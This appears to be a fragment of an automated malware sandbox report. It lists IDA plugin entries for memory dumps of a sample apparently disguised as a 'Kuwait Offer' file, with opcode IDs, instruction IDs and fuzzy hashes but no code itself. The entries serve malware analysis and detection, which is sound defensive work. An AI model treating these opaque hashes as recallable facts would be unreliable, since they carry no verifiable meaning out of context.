                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 03594b6e7e741ab9519599cc7ae3e4e2747af02d5681f48b88f74c4eede1ea79
                                          • Instruction ID: 5e2a6b140babfdbff611d2f9a84e752b964a196407fafa6bc020866ed5599937
                                          • Opcode Fuzzy Hash: 03594b6e7e741ab9519599cc7ae3e4e2747af02d5681f48b88f74c4eede1ea79
                                          • Instruction Fuzzy Hash: 01F09274915669CFEB708F54D888BAABBB6FB09355F0045E5D409A3281D7784AC8CF82
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b5a33bee913152af24a422dd1b1d2bcdde9ca026496852a0ed508041937304a
                                          • Instruction ID: cf5addd3bab851cac06094b2c5052820ba9260e39654a7be5417581110b0a9ae
                                          • Opcode Fuzzy Hash: 2b5a33bee913152af24a422dd1b1d2bcdde9ca026496852a0ed508041937304a
                                          • Instruction Fuzzy Hash: 22419470B106288FCB94EB68C854AAE7BBAAFC9700F10441DE5129B394CF749C068B95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b84522b4390dd2be7c40e85199b19ed66e850739f68ae31a53805012184a287
                                          • Instruction ID: 3b9d94dede33972fe4b9c1ca64f0583e4cf57c46aad95a5945390ccb2ae77776
                                          • Opcode Fuzzy Hash: 9b84522b4390dd2be7c40e85199b19ed66e850739f68ae31a53805012184a287
                                          • Instruction Fuzzy Hash: A941B6717002049FCF45CFA5D894E9ABFB6EF89310B158069E7069B361DA31EC16CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74f441960d5464a4ce905fda5db175a0cca8457fac1d58d42808d7ff136a9a3f
                                          • Instruction ID: 93cb1a5147b2abb7c64b9a741ba62df64700b901788cd6338b8b15a8d1857c87
                                          • Opcode Fuzzy Hash: 74f441960d5464a4ce905fda5db175a0cca8457fac1d58d42808d7ff136a9a3f
                                          • Instruction Fuzzy Hash: 6341A931F01B648BCBA4DB78D55469BBBF2EF84610F04886ED55ACBA80DB30E941CB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b83428b6b1b0894d5133289be9e9c65bc3065e099c75fa21e54c754764b923c7
                                          • Instruction ID: 13193d9e9a2823773cb90f087d7ce7d72e3d6670018d448bc9d857c0905c184a
                                          • Opcode Fuzzy Hash: b83428b6b1b0894d5133289be9e9c65bc3065e099c75fa21e54c754764b923c7
                                          • Instruction Fuzzy Hash: E5419931E00795AFCB61CF69C944A6ABBF2BF88300F18895DE58697A52D730E905CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17a7f13e6043eec0ff61849fbee96ebd6b1155da8bee97d4348e4830a7a8d952
                                          • Instruction ID: 18332195c65a67f80610fa3d162bd58debf4ad4e6c291b4ae300fc4f2c081923
                                          • Opcode Fuzzy Hash: 17a7f13e6043eec0ff61849fbee96ebd6b1155da8bee97d4348e4830a7a8d952
                                          • Instruction Fuzzy Hash: 63414474D05208DFDB40CFA8D894AAEFBF5FF49300F1095AAD846A7250D3795A44CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92c50042ead9872b41a280c14bca5681059a2addadaff5ac1d69f3248ad2eb9f
                                          • Instruction ID: b5652ed9ac2d089364c3171e62955665cda6dd1446424a5f4d70e455f7ee9dab
                                          • Opcode Fuzzy Hash: 92c50042ead9872b41a280c14bca5681059a2addadaff5ac1d69f3248ad2eb9f
                                          • Instruction Fuzzy Hash: 4A41CE30A00215CFCB50DF65C850AAEBBF5FF84350F02816AE945E72A1E734D949CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24daaa70b4d1ca91c1518177e25ca8a1c809211aeb28b84e5aaa8be62246b927
                                          • Instruction ID: 2335adad7bda4b0d289a3789832da53f08af72c8f2a1ef2a40ce47a806095c58
                                          • Opcode Fuzzy Hash: 24daaa70b4d1ca91c1518177e25ca8a1c809211aeb28b84e5aaa8be62246b927
                                          • Instruction Fuzzy Hash: C6416574E05208CFDB84CFA9D844AEEBBF5FF8A300F0586AAD814A7250D7745948DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0403bc9e31c8b6fca18c08d2e744fb2cd680f84bf2dded64967acd13ddff9b4b
                                          • Instruction ID: dbc59e00e37460a654f6fdf5ad7991cfadcffe795e608a72493854125d766b73
                                          • Opcode Fuzzy Hash: 0403bc9e31c8b6fca18c08d2e744fb2cd680f84bf2dded64967acd13ddff9b4b
                                          • Instruction Fuzzy Hash: CD31F53AA10114DFCB45CF99D888E99BBB2FF49320F0640A8E6099B372C735EC55DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a8e5c1267352130e33a5126a1ff920d506848ca417cecacf166fc98c14ae182
                                          • Instruction ID: a9515835d2e717085bed51a7a4dd5a770bc425d1115555f5a0462dbd1eba3061
                                          • Opcode Fuzzy Hash: 8a8e5c1267352130e33a5126a1ff920d506848ca417cecacf166fc98c14ae182
                                          • Instruction Fuzzy Hash: 1C41F834A112288FEBA5DF64CCA0F99B7B1BF49710F1141D9EA05AB3E1C631AD85CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 617d9ea61bb42f8483c348da2819c505675aab5fd96337ad0dbd29767d19c774
                                          • Instruction ID: b42e5c48cb35f8672e62979fcc5138d11ff2f8600f4b62b06c11dcdb6cad8481
                                          • Opcode Fuzzy Hash: 617d9ea61bb42f8483c348da2819c505675aab5fd96337ad0dbd29767d19c774
                                          • Instruction Fuzzy Hash: BF313235A00219DFDB54DFA5D854AEEBBB5FF88311F108069E812B7354CB359D15CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ccc139b44d34f5e792a0ea4d9146cbfa9113373aba69fca5f6f021775e304c0
                                          • Instruction ID: f104231a833ed2e3840c8e0cc197f6eb0a9ac94b11270c235d37de00d1b564dc
                                          • Opcode Fuzzy Hash: 3ccc139b44d34f5e792a0ea4d9146cbfa9113373aba69fca5f6f021775e304c0
                                          • Instruction Fuzzy Hash: 02313A70805248DFDB51EFA8D14879DBFF5EF86309F1084AEC005A7656EB784989DF06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1099b52743bfcbe17afaa474c16882184f408418130d87c4be57b2c9a6b22479
                                          • Instruction ID: b3ffacf80cced5c7c660e2b116476b7d5dc937236801376106b75b33ed657a64
                                          • Opcode Fuzzy Hash: 1099b52743bfcbe17afaa474c16882184f408418130d87c4be57b2c9a6b22479
                                          • Instruction Fuzzy Hash: 833181713042549FCB42DF2ACCA4AAA7BF9EF8A311B1940A2F955CB371CA31DD51CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d5a7fa123bef2d9f02bfddd0d313e7cc5662c857bef9f59c08a65c2b60dafe3
                                          • Instruction ID: 245ef4a0fa6fc5094e476aa23e3f12506f9e949b67cbcb1fea7f0b42e1b738a9
                                          • Opcode Fuzzy Hash: 6d5a7fa123bef2d9f02bfddd0d313e7cc5662c857bef9f59c08a65c2b60dafe3
                                          • Instruction Fuzzy Hash: 9821D6327056109FD7648B69E844A96BBE9EFC1321B15847FF10DCB252DB31EC46C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b51214bfb4df534394fee5051d757b8aeeb03f43d72d895ba5139a16d619ba6
                                          • Instruction ID: 992ebe3897f8ccd776a8d50808a539d8449cadec99f9740f9f60cadebf741e60
                                          • Opcode Fuzzy Hash: 9b51214bfb4df534394fee5051d757b8aeeb03f43d72d895ba5139a16d619ba6
                                          • Instruction Fuzzy Hash: C431B674A057598FC741EB64C8908AEBFB5EF8A300B0002AFD545D7361EB349E0ACBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88e8625e9465081ec92f05bff58be9abd5dd68c0c76b801156dec48f485d3862
                                          • Instruction ID: 2e667f5e68ef135ac6b031f6ba672149dd7524901ab8491a0794268625027634
                                          • Opcode Fuzzy Hash: 88e8625e9465081ec92f05bff58be9abd5dd68c0c76b801156dec48f485d3862
                                          • Instruction Fuzzy Hash: F8310375E00209CFDB44CFA9D454AAEFBF6EF89300F14D46AC906B7254D73959468FA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9aba4f55abde11b6b45e2d3739a5f480c03e062b1514fce84fd465553ebe9be7
                                          • Instruction ID: 11f4d82c4729d733040096b6a07c52fecf4d4bd5d5d91c2faadc8ff15b0da542
                                          • Opcode Fuzzy Hash: 9aba4f55abde11b6b45e2d3739a5f480c03e062b1514fce84fd465553ebe9be7
                                          • Instruction Fuzzy Hash: 1D31E435A04208EFCB158FA8C4549DD7FF6EF8D320F15551AE951A7391CB309941CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b052b957f1ac88e3f2d77791abb3a46a6b4b9297c3ead7a97368696e50a62802
                                          • Instruction ID: 619a8b40102f015144f5d2bfe0985662d707708aaf18d90fb27495cecfd74e23
                                          • Opcode Fuzzy Hash: b052b957f1ac88e3f2d77791abb3a46a6b4b9297c3ead7a97368696e50a62802
                                          • Instruction Fuzzy Hash: 4331E472A0424CEFCB15DFA4C88089EFBF9EF4A300F10446AE585D7251DA30E905CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51392a680af84e34da2ae83c299a0128550cc6f8b7c87e7b24b93497aa7c95f1
                                          • Instruction ID: 712b8bb20a1762c60610eb08d0c961333f42c28823ec6b2c7023fe15f0ab7e30
                                          • Opcode Fuzzy Hash: 51392a680af84e34da2ae83c299a0128550cc6f8b7c87e7b24b93497aa7c95f1
                                          • Instruction Fuzzy Hash: 38311F74E00209CFDB44CFA9D844AEEBBB6FF89310F02926AD824B7250D7749944DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2873b16de3ae6af2fe3a7fffc57a854f4ba593de94a3b33ada1acb1876d158a9
                                          • Instruction ID: 19bd9b4b560670c9588af28f5627b29ed6896ecfa86f7d451686f460168b4f3b
                                          • Opcode Fuzzy Hash: 2873b16de3ae6af2fe3a7fffc57a854f4ba593de94a3b33ada1acb1876d158a9
                                          • Instruction Fuzzy Hash: C0313575E00218DFCB05DFA9D854AEEBBB6FF88310F10802AE816A3364DB305941DFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1dedd34700f8924f4f43c3cd2034efa2ba01fad4c8ea9cf9a2fd6ac917af91e4
                                          • Instruction ID: 3dd15af2995617db6f096f38e3a62a2d63e0c22ebc587215edc768e42324c1d1
                                          • Opcode Fuzzy Hash: 1dedd34700f8924f4f43c3cd2034efa2ba01fad4c8ea9cf9a2fd6ac917af91e4
                                          • Instruction Fuzzy Hash: 0631D274E00209DFDB44DFAAD454AAEFBFAEF89300F10D46AC916B7244D73959528F90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95a576a6216010c1ddbf31ec8f208fb18c4f5ce0f79bff1444cd9bcf5cea631b
                                          • Instruction ID: cde9e6fbe22d9ac7e8f84642227418adc842bd318aa56f33a9047fc7a47a0753
                                          • Opcode Fuzzy Hash: 95a576a6216010c1ddbf31ec8f208fb18c4f5ce0f79bff1444cd9bcf5cea631b
                                          • Instruction Fuzzy Hash: B1317A31200215DFDB54CF66D884AAEBBE6FF88304F148569F9058B3A1CB75DC91CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f36db2a288ee9db712f060b623e483a6c84d5e67edd42552748a8d94746b91c
                                          • Instruction ID: c1bc403062c35559adcd692dd208e6a12c9804bb4a78fbae182e37ae5039a3bb
                                          • Opcode Fuzzy Hash: 3f36db2a288ee9db712f060b623e483a6c84d5e67edd42552748a8d94746b91c
                                          • Instruction Fuzzy Hash: F931F270E15218CFEBA4CF58D468FA9B7B6FB49304F1184A9D80AA3251C7759885CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb84929f0cdfe00c64700b856a658f8f38a1ea783a28eeae2fe0debb9bca1486
                                          • Instruction ID: 88d842363f795ac661cd06b29fda5c7294c4958d044fa9d198c2ee85ec865fda
                                          • Opcode Fuzzy Hash: bb84929f0cdfe00c64700b856a658f8f38a1ea783a28eeae2fe0debb9bca1486
                                          • Instruction Fuzzy Hash: 7231E1B0D15219DFDB84CFA9D944AEEBBF6BB89304F118169D809B3350D7384A41EF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84f54ae511be2091d2833bb70caa47c6c3df58e005dfe045552187b19e6c065a
                                          • Instruction ID: eee3b111617cced1199aac795c2532f7a6666399245ae5018f30851224ce421f
                                          • Opcode Fuzzy Hash: 84f54ae511be2091d2833bb70caa47c6c3df58e005dfe045552187b19e6c065a
                                          • Instruction Fuzzy Hash: D221AD34A00254DFD745DF6DC458AAEBBB6EF89714F15806EE402AB3A2CF749C05CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • Opcode Fuzzy Hash: ace14db7fde98c106415685e7f77a6b58cbd01d699bea98dea42604a56a1fbed
                                          • Instruction Fuzzy Hash: DC2103B8900108DFD764DFA8D894BEDB7BAFB49309F004499DA0AB7280CB385C84CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51958831e94d35ea6f8e53f0b51fcdc0dc1d3f849ef6ebcea8b62ff1ee0d3ec1
                                          • Instruction ID: 886c98eddb28d4de4a1ab590868bbcacc44f192f6e081a501e30fcb72714d55d
                                          • Opcode Fuzzy Hash: 51958831e94d35ea6f8e53f0b51fcdc0dc1d3f849ef6ebcea8b62ff1ee0d3ec1
                                          • Instruction Fuzzy Hash: F721E674D14218DFD754DF58D898BEDB7BAFB8A305F004499DA0AA7384C7385D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f1125b5d0f7970c2caf3964ad8ae796d66fade95c5f2e17f186a608e13a7a67
                                          • Instruction ID: 9d4aa092997cf967cda6a0b3614d9bac2ac99254c9b2dac5322ab3be6e018029
                                          • Opcode Fuzzy Hash: 3f1125b5d0f7970c2caf3964ad8ae796d66fade95c5f2e17f186a608e13a7a67
                                          • Instruction Fuzzy Hash: FA21F874E10118DFD754DF58D894BEDB7BAFB49314F005499DA0AB7284CB345D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf90c3e0bf33c61d40dc2a30a28ab77524c8469a64c5fa27149aae4b6a9f6d59
                                          • Instruction ID: a5106ab27a1a0fd559eab1f277610a61b2b0136a0c95b687f889523409174165
                                          • Opcode Fuzzy Hash: cf90c3e0bf33c61d40dc2a30a28ab77524c8469a64c5fa27149aae4b6a9f6d59
                                          • Instruction Fuzzy Hash: E42103B4D10118DFD754DF58D894BEDB7BAFB49304F004599DA0AA7280CB385D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48b046afc083acc4a13d268d38237cb8528a762ba0cf430b5f037f5a0096a41a
                                          • Instruction ID: 986a22d78d9817cc50707c4bb201506a703f2c418c8d7448783b8a28fdc95d10
                                          • Opcode Fuzzy Hash: 48b046afc083acc4a13d268d38237cb8528a762ba0cf430b5f037f5a0096a41a
                                          • Instruction Fuzzy Hash: DB212574910108DFCB54DF68E894BEEB7BAFB4A304F0055A9DA0AB7380CB385D848F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c2e0f8009f25035590b5bc519fc8379fccf4c75c7c6eddcc4251c36cb626034
                                          • Instruction ID: 57eec7a3ab146ebdfeb88cec35c3ce98531cc30c5ef1d964347aed93ac4bcb9a
                                          • Opcode Fuzzy Hash: 5c2e0f8009f25035590b5bc519fc8379fccf4c75c7c6eddcc4251c36cb626034
                                          • Instruction Fuzzy Hash: 65015B317102208B9B04AF69E8949AEB79FEFC6721714803EE70ACB766CA748C05C790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7d69cd7d2f412c4e9d925c868e8764acac3cc3af99fcbdec283465e8fa00ec2
                                          • Instruction ID: bfbadd97e89457583cbf63793c45487d03d09b603ed5bcd51e81970041fdb888
                                          • Opcode Fuzzy Hash: e7d69cd7d2f412c4e9d925c868e8764acac3cc3af99fcbdec283465e8fa00ec2
                                          • Instruction Fuzzy Hash: 94118B35A00220CFCB94CF68D984D9ABBF5EF89660B1140A9F906CB322DB31DC41CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6eed3265437fadafed9cf40bc716ef4d1c0a24eb4e4aa9c701ea8d49db6f874c
                                          • Instruction ID: a93d0022e8aade89625f334e6bb331256a0aa878e8bc954349c4d59d62e1287b
                                          • Opcode Fuzzy Hash: 6eed3265437fadafed9cf40bc716ef4d1c0a24eb4e4aa9c701ea8d49db6f874c
                                          • Instruction Fuzzy Hash: 2011AC71D042A5AFCB91DB78C9046EAFFF0EF02301F1445AAD0D5CB242E3348156DB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f52cf9d700959b16345672d6e8a26c0e966f415522764cceabf184bb6705950
                                          • Instruction ID: 660e8c08f9b2197cd229b4a50e658ba9ee8822ace58db00add936459893ceb69
                                          • Opcode Fuzzy Hash: 0f52cf9d700959b16345672d6e8a26c0e966f415522764cceabf184bb6705950
                                          • Instruction Fuzzy Hash: 1101B933A042545FD754DA98E040FDABBE4EF55221F25806BE844D7250D631D994CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cf56410e051da7a40b6803bf9e2d62142453d9f553f6e969a3bee25707724c6
                                          • Instruction ID: 7ef03ac03aeb132c29ab1b09c3f763e848c9ff4eae137d4222a4d9bfade11d11
                                          • Opcode Fuzzy Hash: 3cf56410e051da7a40b6803bf9e2d62142453d9f553f6e969a3bee25707724c6
                                          • Instruction Fuzzy Hash: 39014436350215AFDB108E59DC94FAA7BA9EB89721F108066FA15CB290CAB1D9118B90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: de3bbeed899043e8cc438cc993669670dc0c3c10fb6c48e31248df9327d40425
                                          • Instruction ID: ec57a649004e54242011d0d5142ad6d6aad751157a3c9a7fd2f90c5e5d6fe09e
                                          • Opcode Fuzzy Hash: de3bbeed899043e8cc438cc993669670dc0c3c10fb6c48e31248df9327d40425
                                          • Instruction Fuzzy Hash: 1501A1357047949FC3659B74D818E6B3BA6EFC6320F04466EE1A28B691CB35D842D790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
